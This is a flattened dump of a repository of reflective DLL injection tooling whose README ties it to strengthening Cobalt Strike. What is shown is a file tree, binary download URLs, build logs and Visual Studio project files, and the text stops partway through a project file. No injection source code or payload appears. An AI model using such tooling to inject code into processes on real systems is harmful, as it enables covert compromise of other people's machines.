├── README.md
├── ReflectiveDLLInjection-master
    ├── Release
    │   ├── inject.exe
    │   ├── inject.iobj
    │   ├── inject.ipdb
    │   ├── inject.pdb
    │   ├── reflective_dll.exp
    │   ├── reflective_dll.iobj
    │   ├── reflective_dll.ipdb
    │   ├── reflective_dll.lib
    │   └── reflective_dll.pdb
    ├── bin
    │   ├── inject.arm.exe
    │   ├── inject.exe
    │   ├── inject.x64.exe
    │   └── reflective_dll.arm.dll
    ├── dll
    │   ├── Release
    │   │   ├── ReflectiveDll.obj
    │   │   ├── ReflectiveLoader.obj
    │   │   ├── reflective_dll.Build.CppClean.log
    │   │   ├── reflective_dll.log
    │   │   └── reflective_dll.tlog
    │   │   │   ├── CL.command.1.tlog
    │   │   │   ├── CL.read.1.tlog
    │   │   │   ├── CL.write.1.tlog
    │   │   │   ├── link.command.1.tlog
    │   │   │   ├── link.read.1.tlog
    │   │   │   ├── link.write.1.tlog
    │   │   │   ├── reflective_dll.lastbuildstate
    │   │   │   └── reflective_dll.write.1u.tlog
    │   ├── reflective_dll.sln
    │   ├── reflective_dll.vcproj
    │   ├── reflective_dll.vcxproj
    │   ├── reflective_dll.vcxproj.filters
    │   ├── reflective_dll.vcxproj.user
    │   ├── src
    │   │   ├── ReflectiveDLLInjection.h
    │   │   ├── ReflectiveDll.cpp
    │   │   ├── ReflectiveLoader.cpp
    │   │   └── ReflectiveLoader.h
    │   └── x64
    │   │   └── Release
    │   │       ├── reflective_dll.Build.CppClean.log
    │   │       └── reflective_dll.log
    ├── inject
    │   ├── Release
    │   │   ├── GetProcAddressR.obj
    │   │   ├── Inject.obj
    │   │   ├── inject.Build.CppClean.log
    │   │   ├── inject.log
    │   │   └── inject.tlog
    │   │   │   ├── CL.command.1.tlog
    │   │   │   ├── CL.read.1.tlog
    │   │   │   ├── CL.write.1.tlog
    │   │   │   ├── inject.lastbuildstate
    │   │   │   ├── inject.write.1u.tlog
    │   │   │   ├── link.command.1.tlog
    │   │   │   ├── link.read.1.tlog
    │   │   │   └── link.write.1.tlog
    │   ├── inject.sln
    │   ├── inject.vcproj
    │   ├── inject.vcxproj
    │   ├── inject.vcxproj.filters
    │   ├── inject.vcxproj.user
    │   └── src
    │   │   ├── GetProcAddressR.c
    │   │   ├── GetProcAddressR.h
    │   │   ├── Inject.c
    │   │   ├── LoadLibraryR.c
    │   │   ├── LoadLibraryR.h
    │   │   └── ReflectiveDLLInjection.h
    ├── rdi.sln
    └── x64
    │   └── Release
    │       ├── inject.x64.iobj
    │       └── inject.x64.ipdb
└── go-ReflectiveDLL-master
    ├── README.md
    ├── ReflectiveDll.h
    ├── dllmain.a
    ├── dllmain.c
    ├── dllmain.def
    ├── dllmain.go
    ├── dllmain.h
    ├── go-ReflectiveDLL-master.zip
    ├── main.go
    ├── x32
        ├── ReflectiveDll.h
        ├── dllmain.c
        ├── dllmain.def
        ├── dllmain.go
        ├── dllmain.h
        ├── inject.exe
        ├── main.go
        └── x32.bat
    └── x64.bat


/README.md:
--------------------------------------------------------------------------------
 1 | # ReflectiveDLLInjection
 2 | 
 3 | ## 相关文章
 4 | 
 5 | [利用ReflectiveDLL来武装你的Cobalt Strike
 6 | ](https://uknowsec.cn/posts/notes/%E5%88%A9%E7%94%A8ReflectiveDLL%E6%9D%A5%E6%AD%A6%E8%A3%85%E4%BD%A0%E7%9A%84Cobalt%20Strike.html)
 7 | 
 8 | ## References
 9 |   
10 |  go-ReflectiveDLL: https://github.com/WBGlIl/go-ReflectiveDLL 
11 |  
12 |  
13 |  ReflectiveDLLInjection: https://github.com/stephenfewer/ReflectiveDLLInjection
14 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/inject.exe


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/inject.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/inject.iobj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/inject.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/inject.ipdb


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/inject.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/inject.pdb


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/reflective_dll.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/reflective_dll.exp


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/reflective_dll.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/reflective_dll.iobj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/reflective_dll.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/reflective_dll.ipdb


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/reflective_dll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/reflective_dll.lib


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/Release/reflective_dll.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/Release/reflective_dll.pdb


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/bin/inject.arm.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/bin/inject.arm.exe


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/bin/inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/bin/inject.exe


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/bin/inject.x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/bin/inject.x64.exe


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/bin/reflective_dll.arm.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/bin/reflective_dll.arm.dll


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/ReflectiveDll.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/ReflectiveDll.obj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/ReflectiveLoader.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/ReflectiveLoader.obj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\vc142.pdb
 2 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflectiveloader.obj
 3 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflectivedll.obj
 4 | c:\users\hp\desktop\reflectivedllinjection-master\release\reflective_dll.dll
 5 | c:\users\hp\desktop\reflectivedllinjection-master\release\reflective_dll.pdb
 6 | c:\users\hp\desktop\reflectivedllinjection-master\release\reflective_dll.lib
 7 | c:\users\hp\desktop\reflectivedllinjection-master\release\reflective_dll.exp
 8 | c:\users\hp\desktop\reflectivedllinjection-master\release\reflective_dll.ipdb
 9 | c:\users\hp\desktop\reflectivedllinjection-master\release\reflective_dll.iobj
10 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\vcpkg.applocal.log
11 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\cl.command.1.tlog
12 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\cl.read.1.tlog
13 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\cl.write.1.tlog
14 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\link.command.1.tlog
15 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\link.read.1.tlog
16 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\link.write.1.tlog
17 | c:\users\hp\desktop\reflectivedllinjection-master\dll\release\reflective_dll.tlog\reflective_dll.write.1u.tlog
18 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.log:
--------------------------------------------------------------------------------
 1 |   ReflectiveDll.cpp
 2 | C:\Users\HP\Desktop\ReflectiveDLLInjection-master\dll\src\ReflectiveDll.cpp(59,25): warning C4018: “<”: 有符号/无符号不匹配
 3 |   ReflectiveLoader.cpp
 4 |     正在创建库 C:\Users\HP\Desktop\ReflectiveDLLInjection-master\Release\reflective_dll.lib 和对象 C:\Users\HP\Desktop\ReflectiveDLLInjection-master\Release\reflective_dll.exp
 5 |   正在生成代码
 6 |   Previous IPDB not found, fall back to full compilation.
 7 |   All 140 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
 8 |   已完成代码的生成
 9 |   reflective_dll.vcxproj -> C:\Users\HP\Desktop\ReflectiveDLLInjection-master\Release\reflective_dll.dll
10 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/reflective_dll.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.26.28801:TargetPlatformVersion=10.0.18362.0:
2 | Release|Win32|C:\Users\HP\Desktop\ReflectiveDLLInjection-master\|
3 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/reflective_dll.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/Release/reflective_dll.tlog/reflective_dll.write.1u.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/reflective_dll.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 10.00
 3 | # Visual C++ Express 2008
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Release|Win32 = Release|Win32
10 | 	EndGlobalSection
11 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
13 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
14 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
15 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
16 | 	EndGlobalSection
17 | 	GlobalSection(SolutionProperties) = preSolution
18 | 		HideSolutionNode = FALSE
19 | 	EndGlobalSection
20 | EndGlobal
21 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/reflective_dll.vcproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="Windows-1252"?>
  2 | <VisualStudioProject
  3 | 	ProjectType="Visual C++"
  4 | 	Version="9.00"
  5 | 	Name="reflective_dll"
  6 | 	ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
  7 | 	RootNamespace="reflective_dll"
  8 | 	Keyword="Win32Proj"
  9 | 	TargetFrameworkVersion="196613"
 10 | 	>
 11 | 	<Platforms>
 12 | 		<Platform
 13 | 			Name="Win32"
 14 | 		/>
 15 | 		<Platform
 16 | 			Name="x64"
 17 | 		/>
 18 | 	</Platforms>
 19 | 	<ToolFiles>
 20 | 	</ToolFiles>
 21 | 	<Configurations>
 22 | 		<Configuration
 23 | 			Name="Debug|Win32"
 24 | 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 25 | 			IntermediateDirectory="$(ConfigurationName)"
 26 | 			ConfigurationType="2"
 27 | 			CharacterSet="1"
 28 | 			>
 29 | 			<Tool
 30 | 				Name="VCPreBuildEventTool"
 31 | 			/>
 32 | 			<Tool
 33 | 				Name="VCCustomBuildTool"
 34 | 			/>
 35 | 			<Tool
 36 | 				Name="VCXMLDataGeneratorTool"
 37 | 			/>
 38 | 			<Tool
 39 | 				Name="VCWebServiceProxyGeneratorTool"
 40 | 			/>
 41 | 			<Tool
 42 | 				Name="VCMIDLTool"
 43 | 			/>
 44 | 			<Tool
 45 | 				Name="VCCLCompilerTool"
 46 | 				Optimization="0"
 47 | 				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
 48 | 				MinimalRebuild="true"
 49 | 				BasicRuntimeChecks="3"
 50 | 				RuntimeLibrary="3"
 51 | 				UsePrecompiledHeader="0"
 52 | 				WarningLevel="3"
 53 | 				DebugInformationFormat="4"
 54 | 			/>
 55 | 			<Tool
 56 | 				Name="VCManagedResourceCompilerTool"
 57 | 			/>
 58 | 			<Tool
 59 | 				Name="VCResourceCompilerTool"
 60 | 			/>
 61 | 			<Tool
 62 | 				Name="VCPreLinkEventTool"
 63 | 			/>
 64 | 			<Tool
 65 | 				Name="VCLinkerTool"
 66 | 				LinkIncremental="2"
 67 | 				GenerateDebugInformation="true"
 68 | 				SubSystem="2"
 69 | 				TargetMachine="1"
 70 | 			/>
 71 | 			<Tool
 72 | 				Name="VCALinkTool"
 73 | 			/>
 74 | 			<Tool
 75 | 				Name="VCManifestTool"
 76 | 			/>
 77 | 			<Tool
 78 | 				Name="VCXDCMakeTool"
 79 | 			/>
 80 | 			<Tool
 81 | 				Name="VCBscMakeTool"
 82 | 			/>
 83 | 			<Tool
 84 | 				Name="VCFxCopTool"
 85 | 			/>
 86 | 			<Tool
 87 | 				Name="VCAppVerifierTool"
 88 | 			/>
 89 | 			<Tool
 90 | 				Name="VCPostBuildEventTool"
 91 | 			/>
 92 | 		</Configuration>
 93 | 		<Configuration
 94 | 			Name="Debug|x64"
 95 | 			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
 96 | 			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
 97 | 			ConfigurationType="2"
 98 | 			CharacterSet="1"
 99 | 			>
100 | 			<Tool
101 | 				Name="VCPreBuildEventTool"
102 | 			/>
103 | 			<Tool
104 | 				Name="VCCustomBuildTool"
105 | 			/>
106 | 			<Tool
107 | 				Name="VCXMLDataGeneratorTool"
108 | 			/>
109 | 			<Tool
110 | 				Name="VCWebServiceProxyGeneratorTool"
111 | 			/>
112 | 			<Tool
113 | 				Name="VCMIDLTool"
114 | 				TargetEnvironment="3"
115 | 			/>
116 | 			<Tool
117 | 				Name="VCCLCompilerTool"
118 | 				Optimization="0"
119 | 				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
120 | 				MinimalRebuild="true"
121 | 				BasicRuntimeChecks="3"
122 | 				RuntimeLibrary="3"
123 | 				UsePrecompiledHeader="0"
124 | 				WarningLevel="3"
125 | 				DebugInformationFormat="3"
126 | 			/>
127 | 			<Tool
128 | 				Name="VCManagedResourceCompilerTool"
129 | 			/>
130 | 			<Tool
131 | 				Name="VCResourceCompilerTool"
132 | 			/>
133 | 			<Tool
134 | 				Name="VCPreLinkEventTool"
135 | 			/>
136 | 			<Tool
137 | 				Name="VCLinkerTool"
138 | 				LinkIncremental="2"
139 | 				GenerateDebugInformation="true"
140 | 				SubSystem="2"
141 | 				TargetMachine="17"
142 | 			/>
143 | 			<Tool
144 | 				Name="VCALinkTool"
145 | 			/>
146 | 			<Tool
147 | 				Name="VCManifestTool"
148 | 			/>
149 | 			<Tool
150 | 				Name="VCXDCMakeTool"
151 | 			/>
152 | 			<Tool
153 | 				Name="VCBscMakeTool"
154 | 			/>
155 | 			<Tool
156 | 				Name="VCFxCopTool"
157 | 			/>
158 | 			<Tool
159 | 				Name="VCAppVerifierTool"
160 | 			/>
161 | 			<Tool
162 | 				Name="VCPostBuildEventTool"
163 | 			/>
164 | 		</Configuration>
165 | 		<Configuration
166 | 			Name="Release|Win32"
167 | 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
168 | 			IntermediateDirectory="$(ConfigurationName)"
169 | 			ConfigurationType="2"
170 | 			CharacterSet="2"
171 | 			WholeProgramOptimization="1"
172 | 			>
173 | 			<Tool
174 | 				Name="VCPreBuildEventTool"
175 | 			/>
176 | 			<Tool
177 | 				Name="VCCustomBuildTool"
178 | 			/>
179 | 			<Tool
180 | 				Name="VCXMLDataGeneratorTool"
181 | 			/>
182 | 			<Tool
183 | 				Name="VCWebServiceProxyGeneratorTool"
184 | 			/>
185 | 			<Tool
186 | 				Name="VCMIDLTool"
187 | 			/>
188 | 			<Tool
189 | 				Name="VCCLCompilerTool"
190 | 				Optimization="2"
191 | 				InlineFunctionExpansion="1"
192 | 				EnableIntrinsicFunctions="true"
193 | 				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
194 | 				RuntimeLibrary="0"
195 | 				EnableFunctionLevelLinking="true"
196 | 				UsePrecompiledHeader="0"
197 | 				WarningLevel="3"
198 | 				DebugInformationFormat="3"
199 | 			/>
200 | 			<Tool
201 | 				Name="VCManagedResourceCompilerTool"
202 | 			/>
203 | 			<Tool
204 | 				Name="VCResourceCompilerTool"
205 | 			/>
206 | 			<Tool
207 | 				Name="VCPreLinkEventTool"
208 | 			/>
209 | 			<Tool
210 | 				Name="VCLinkerTool"
211 | 				LinkIncremental="1"
212 | 				GenerateDebugInformation="true"
213 | 				SubSystem="2"
214 | 				OptimizeReferences="2"
215 | 				EnableCOMDATFolding="2"
216 | 				TargetMachine="1"
217 | 			/>
218 | 			<Tool
219 | 				Name="VCALinkTool"
220 | 			/>
221 | 			<Tool
222 | 				Name="VCManifestTool"
223 | 			/>
224 | 			<Tool
225 | 				Name="VCXDCMakeTool"
226 | 			/>
227 | 			<Tool
228 | 				Name="VCBscMakeTool"
229 | 			/>
230 | 			<Tool
231 | 				Name="VCFxCopTool"
232 | 			/>
233 | 			<Tool
234 | 				Name="VCAppVerifierTool"
235 | 			/>
236 | 			<Tool
237 | 				Name="VCPostBuildEventTool"
238 | 				CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
239 | 			/>
240 | 		</Configuration>
241 | 		<Configuration
242 | 			Name="Release|x64"
243 | 			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
244 | 			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
245 | 			ConfigurationType="2"
246 | 			CharacterSet="2"
247 | 			WholeProgramOptimization="0"
248 | 			>
249 | 			<Tool
250 | 				Name="VCPreBuildEventTool"
251 | 			/>
252 | 			<Tool
253 | 				Name="VCCustomBuildTool"
254 | 			/>
255 | 			<Tool
256 | 				Name="VCXMLDataGeneratorTool"
257 | 			/>
258 | 			<Tool
259 | 				Name="VCWebServiceProxyGeneratorTool"
260 | 			/>
261 | 			<Tool
262 | 				Name="VCMIDLTool"
263 | 				TargetEnvironment="3"
264 | 			/>
265 | 			<Tool
266 | 				Name="VCCLCompilerTool"
267 | 				Optimization="2"
268 | 				InlineFunctionExpansion="1"
269 | 				EnableIntrinsicFunctions="true"
270 | 				FavorSizeOrSpeed="2"
271 | 				WholeProgramOptimization="false"
272 | 				PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
273 | 				RuntimeLibrary="0"
274 | 				EnableFunctionLevelLinking="true"
275 | 				UsePrecompiledHeader="0"
276 | 				WarningLevel="3"
277 | 				DebugInformationFormat="3"
278 | 				CompileAs="2"
279 | 			/>
280 | 			<Tool
281 | 				Name="VCManagedResourceCompilerTool"
282 | 			/>
283 | 			<Tool
284 | 				Name="VCResourceCompilerTool"
285 | 			/>
286 | 			<Tool
287 | 				Name="VCPreLinkEventTool"
288 | 			/>
289 | 			<Tool
290 | 				Name="VCLinkerTool"
291 | 				OutputFile="$(OutDir)\$(ProjectName).x64.dll"
292 | 				LinkIncremental="1"
293 | 				GenerateDebugInformation="true"
294 | 				SubSystem="2"
295 | 				OptimizeReferences="2"
296 | 				EnableCOMDATFolding="2"
297 | 				TargetMachine="17"
298 | 			/>
299 | 			<Tool
300 | 				Name="VCALinkTool"
301 | 			/>
302 | 			<Tool
303 | 				Name="VCManifestTool"
304 | 			/>
305 | 			<Tool
306 | 				Name="VCXDCMakeTool"
307 | 			/>
308 | 			<Tool
309 | 				Name="VCBscMakeTool"
310 | 			/>
311 | 			<Tool
312 | 				Name="VCFxCopTool"
313 | 			/>
314 | 			<Tool
315 | 				Name="VCAppVerifierTool"
316 | 			/>
317 | 			<Tool
318 | 				Name="VCPostBuildEventTool"
319 | 				CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
320 | 			/>
321 | 		</Configuration>
322 | 	</Configurations>
323 | 	<References>
324 | 	</References>
325 | 	<Files>
326 | 		<Filter
327 | 			Name="Source Files"
328 | 			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
329 | 			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
330 | 			>
331 | 			<File
332 | 				RelativePath=".\src\ReflectiveDll.c"
333 | 				>
334 | 			</File>
335 | 			<File
336 | 				RelativePath=".\src\ReflectiveLoader.c"
337 | 				>
338 | 			</File>
339 | 		</Filter>
340 | 		<Filter
341 | 			Name="Header Files"
342 | 			Filter="h;hpp;hxx;hm;inl;inc;xsd"
343 | 			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
344 | 			>
345 | 			<File
346 | 				RelativePath=".\src\ReflectiveDLLInjection.h"
347 | 				>
348 | 			</File>
349 | 			<File
350 | 				RelativePath=".\src\ReflectiveLoader.h"
351 | 				>
352 | 			</File>
353 | 		</Filter>
354 | 	</Files>
355 | 	<Globals>
356 | 	</Globals>
357 | </VisualStudioProject>
358 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/reflective_dll.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|ARM">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>ARM</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|Win32">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|ARM">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>ARM</Platform>
 19 |     </ProjectConfiguration>
 20 |     <ProjectConfiguration Include="Release|Win32">
 21 |       <Configuration>Release</Configuration>
 22 |       <Platform>Win32</Platform>
 23 |     </ProjectConfiguration>
 24 |     <ProjectConfiguration Include="Release|x64">
 25 |       <Configuration>Release</Configuration>
 26 |       <Platform>x64</Platform>
 27 |     </ProjectConfiguration>
 28 |   </ItemGroup>
 29 |   <PropertyGroup Label="Globals">
 30 |     <ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
 31 |     <RootNamespace>reflective_dll</RootNamespace>
 32 |     <Keyword>Win32Proj</Keyword>
 33 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 34 |   </PropertyGroup>
 35 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <CharacterSet>Unicode</CharacterSet>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <UseOfMfc>Static</UseOfMfc>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
 44 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>MultiByte</CharacterSet>
 47 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 50 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <CharacterSet>Unicode</CharacterSet>
 53 |   </PropertyGroup>
 54 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
 55 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 56 |     <PlatformToolset>v142</PlatformToolset>
 57 |     <CharacterSet>Unicode</CharacterSet>
 58 |   </PropertyGroup>
